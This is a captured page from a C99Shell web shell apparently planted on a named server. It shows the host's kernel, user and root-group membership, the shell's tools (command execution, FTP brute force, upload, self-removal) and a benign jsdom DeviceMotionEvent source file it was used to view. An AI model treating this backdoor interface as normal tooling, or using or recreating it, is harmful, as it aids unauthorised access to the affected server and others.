!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/rentals.picotech.app/public_html/node_modules/jsdom/lib/jsdom/living/events/   drwxr-xr-x
Free 23.53 GB of 117.98 GB (19.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     DeviceMotionEvent-impl.js (1.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"use strict";

const EventImpl = require("./Event-impl").implementation;
const { implementation: DeviceMotionEventAccelerationImpl } =
  require("../deviceorientation/DeviceMotionEventAcceleration-impl");
const { implementation: DeviceMotionEventRotationRateImpl } =
  require("../deviceorientation/DeviceMotionEventRotationRate-impl");

class DeviceMotionEventImpl extends EventImpl {
  constructor(globalObject, args, privateData) {
    super(globalObject, args, privateData);

    const eventInitDict = args[1];

    this.acceleration = null;
    if (eventInitDict?.acceleration) {
      const accelImpl = new DeviceMotionEventAccelerationImpl(globalObject, [], {});
      accelImpl.x = eventInitDict.acceleration.x;
      accelImpl.y = eventInitDict.acceleration.y;
      accelImpl.z = eventInitDict.acceleration.z;
      this.acceleration = accelImpl;
    }

    this.accelerationIncludingGravity = null;
    if (eventInitDict?.accelerationIncludingGravity) {
      const accelGImpl = new DeviceMotionEventAccelerationImpl(globalObject, [], {});
      accelGImpl.x = eventInitDict.accelerationIncludingGravity.x;
      accelGImpl.y = eventInitDict.accelerationIncludingGravity.y;
      accelGImpl.z = eventInitDict.accelerationIncludingGravity.z;
      this.accelerationIncludingGravity = accelGImpl;
    }

    this.rotationRate = null;
    if (eventInitDict?.rotationRate) {
      const rotImpl = new DeviceMotionEventRotationRateImpl(globalObject, [], {});
      rotImpl.alpha = eventInitDict.rotationRate.alpha;
      rotImpl.beta = eventInitDict.rotationRate.beta;
      rotImpl.gamma = eventInitDict.rotationRate.gamma;
      this.rotationRate = rotImpl;
    }

    this.interval = eventInitDict?.interval ?? 0;
  }
}
DeviceMotionEventImpl.defaultInit = Object.create(null);

module.exports = {
  implementation: DeviceMotionEventImpl
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0029 ]--